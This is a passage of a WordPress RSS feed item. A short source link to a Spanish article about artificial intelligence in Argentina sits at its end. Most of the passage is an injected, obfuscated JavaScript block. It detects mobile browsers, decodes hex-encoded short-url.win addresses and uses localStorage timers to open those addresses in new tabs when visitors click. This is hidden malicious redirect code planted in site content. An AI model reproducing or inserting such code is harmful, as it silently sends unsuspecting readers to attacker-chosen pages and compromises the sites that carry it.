u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/avanza-el-uso-de-la-inteligencia-artificial-en-la-argentina-con-experiencias-en-el-sector-publico-privado-y-ongs/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">86348</post-id>	</item>
	</channel>
</rss>
